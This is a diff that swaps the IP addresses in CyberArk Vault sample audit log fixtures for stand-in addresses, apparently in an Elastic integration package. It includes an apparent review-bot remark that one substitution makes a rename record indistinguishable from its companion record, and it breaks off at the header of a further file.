+<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 124\n Rename File\n Info\n Administrator\n Rename File\n \n \n PSM\n Root\\Operating System-UnixSSH-67.43.156.15-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"124","Desc":"Rename File","Severity":"Info","Issuer":"Administrator","Action":"Rename File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSH-67.43.156.15-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File","GatewayStation":"10.0.1.20"}}}
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/125_rename_file_cont.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/125_rename_file_cont.log
index d9c83a42d98..0fcaa02b4dd 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/125_rename_file_cont.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/125_rename_file_cont.log
@@ -1 +1 @@
-<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 125\n Rename File (Cont.)\n Info\n Administrator\n Rename File (Cont.)\n \n \n PSM\n Operating System-UnixSSH-34.71.250.247-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File (Cont.)\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"125","Desc":"Rename File (Cont.)","Severity":"Info","Issuer":"Administrator","Action":"Rename File (Cont.)","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Operating System-UnixSSH-34.71.250.247-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File (Cont.)","GatewayStation":"10.0.1.20"}}}
+<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 125\n Rename File (Cont.)\n Info\n Administrator\n Rename File (Cont.)\n \n \n PSM\n Operating System-UnixSSH-67.43.156.15-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File (Cont.)\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"125","Desc":"Rename File (Cont.)","Severity":"Info","Issuer":"Administrator","Action":"Rename File (Cont.)","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Operating System-UnixSSH-67.43.156.15-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File (Cont.)","GatewayStation":"10.0.1.20"}}}
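Review bot: After this substitution the "Rename File (Cont.)" record no longer shows a visible rename: its new `File` value `Operating System-UnixSSH-67.43.156.15-PSMConnect` matches the `File` of the companion MessageID 124 record carrying the same 2021-03-14T13:42:20Z timestamp except for the `Root\\` prefix, because both 34.123.103.115 (in the 124 sample) and 34.71.250.247 (here) were mapped to 67.43.156.15. If the pipeline turns the 124/125 pair into separate old-name/new-name fields, a test built from these samples can no longer tell a swapped mapping from a correct one. Using a different address from the same supported set for this record, e.g. `Operating System-UnixSSH-67.43.156.14-PSMConnect` in both the `raw` and the structured `File` values, would restore the distinction; the 124 sample is changed in a separate hunk of this diff and would stay as is.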
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/130_cpm_disable_password.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/130_cpm_disable_password.log
index 3f6ae5f7871..e07bae4df57 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/130_cpm_disable_password.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/130_cpm_disable_password.log
@@ -1 +1 @@ -<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 130\n CPM Disable Password\n Error\n PasswordManager\n CPM Disable Password\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;\n CPM Disable Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"130","Desc":"CPM Disable Password","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Disable Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Disable Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 130\n CPM Disable Password\n Error\n PasswordManager\n CPM Disable Password\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=5;username=ELASTIC\\bart;\n CPM Disable Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"130","Desc":"CPM Disable Password","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Disable Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Disable Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} 
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/180_add_user.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/180_add_user.log
index 78ec9f57fe6..e9e3529abd7 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/180_add_user.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/180_add_user.log
@@ -1,12 +1,12 @@ -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T17:59:19Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
09:59:19","IsoTimestamp":"2021-03-10T17:59:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T17:59:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:27","IsoTimestamp":"2021-03-10T17:59:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T22:19:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:06","IsoTimestamp":"2021-03-10T22:19:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T22:19:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:15","IsoTimestamp":"2021-03-10T22:19:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add 
User","SourceUser":"PSMGw_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_VAGRANT\n \n \n \n 81.32.170.205\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_VAGRANT\n \n \n \n 81.32.170.205\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n 
Info\n Administrator\n Add User\n PSMPGW_SSH\n \n \n \n 34.71.250.247\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_SSH\n \n \n \n 34.71.250.247\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_SSH","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n \n 34.71.250.247\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add 
User","SourceUser":"PSMP_ADB_asr-cyberark-psm-ssh","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T17:59:19Z 
VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:19","IsoTimestamp":"2021-03-10T17:59:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T17:59:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:27","IsoTimestamp":"2021-03-10T17:59:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T22:19:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:06","IsoTimestamp":"2021-03-10T22:19:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T22:19:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:15","IsoTimestamp":"2021-03-10T22:19:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add 
User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_VAGRANT\n \n \n \n 67.43.156.13\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_VAGRANT\n \n \n \n 67.43.156.13\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n 
VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_SSH\n \n \n \n 67.43.156.15\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_SSH\n \n \n \n 67.43.156.15\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_SSH","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n \n 67.43.156.15\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add 
User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_asr-cyberark-psm-ssh","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/181_update_safe.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/181_update_safe.log index 93d8a45a00e..9ace149430f 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/181_update_safe.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/181_update_safe.log @@ -1 +1 @@ -<5>1 2021-03-10T18:15:44Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:15:44","IsoTimestamp":"2021-03-10T18:15:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"181","Desc":"Update Safe","Severity":"Info","Issuer":"Administrator","Action":"Update Safe","SourceUser":"","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Safe","GatewayStation":""}}} +<5>1 2021-03-10T18:15:44Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:15:44","IsoTimestamp":"2021-03-10T18:15:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"181","Desc":"Update Safe","Severity":"Info","Issuer":"Administrator","Action":"Update Safe","SourceUser":"","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Safe","GatewayStation":""}}} 
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/185_add_safe.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/185_add_safe.log index 21a17a2c729..bfe809491fe 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/185_add_safe.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/185_add_safe.log 
